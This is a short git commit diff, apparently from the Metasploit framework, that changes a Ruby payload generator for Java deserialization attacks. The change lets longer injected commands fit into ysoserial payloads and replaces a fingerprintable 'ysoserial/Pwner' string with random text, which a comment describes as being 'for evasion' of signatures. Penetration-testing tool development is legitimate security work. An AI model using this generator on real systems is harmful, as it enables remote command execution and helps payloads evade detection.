ysoserial: Support larger payloads, Randomize fingerprintable string

GSoC/Meterpreter_Web_Console
asoto-r7 2018-12-14 14:43:30 -06:00
parent fa74a1839a
commit 212454b1fb
No known key found for this signature in database
GPG Key ID: F531810B7FE55396
1 changed files with 8 additions and 6 deletions


@ -6,7 +6,6 @@ require 'base64'
PAYLOAD_FILENAME="ysoserial_payloads.json"
#TODO: Randomize bytes which could be signatured (ysoserial/Pwner000000000000000)
#TODO: Support ysoserial alongside ysoserial-modified payloads (including cmd, bash, powershell, none)
class Java_deserialization
@ -43,15 +42,18 @@ class Java_deserialization
bufferOffset = payload['bufferOffset'].first #TODO: Do we ever need to support multiple buffers?
bytes[bufferOffset-1] += command
# Overwrite lengthOffset (multiple times, if necessary)
# Overwrite length (multiple times, if necessary)
lengthOffsets = payload['lengthOffset']
lengthOffsets.each do |lengthOffset|
#TODO: Handle command strings >255 chars
raise RuntimeError, "Command buffer too large" if bytes[lengthOffset].ord + command.length > 255
bytes[lengthOffset] = (bytes[lengthOffset].ord + command.length.ord).chr
# Extract length as a 16-bit unsigned int, then add
length = bytes[lengthOffset-1..lengthOffset].unpack("n").first
length += command.length.ord
length = [length].pack("n")
bytes[lengthOffset-1..lengthOffset] = length
end
# TODO: Randomize "ysoserial/Pwner00000000000000"
# Replace "ysoserial\/Pwner" timestamp string with randomness for evasion
bytes.gsub!(/ysoserial\/Pwner00000000000000/, Rex::Text.rand_text_alphanumeric(29))
return bytes
else
raise RuntimeError, "Malformed JSON file"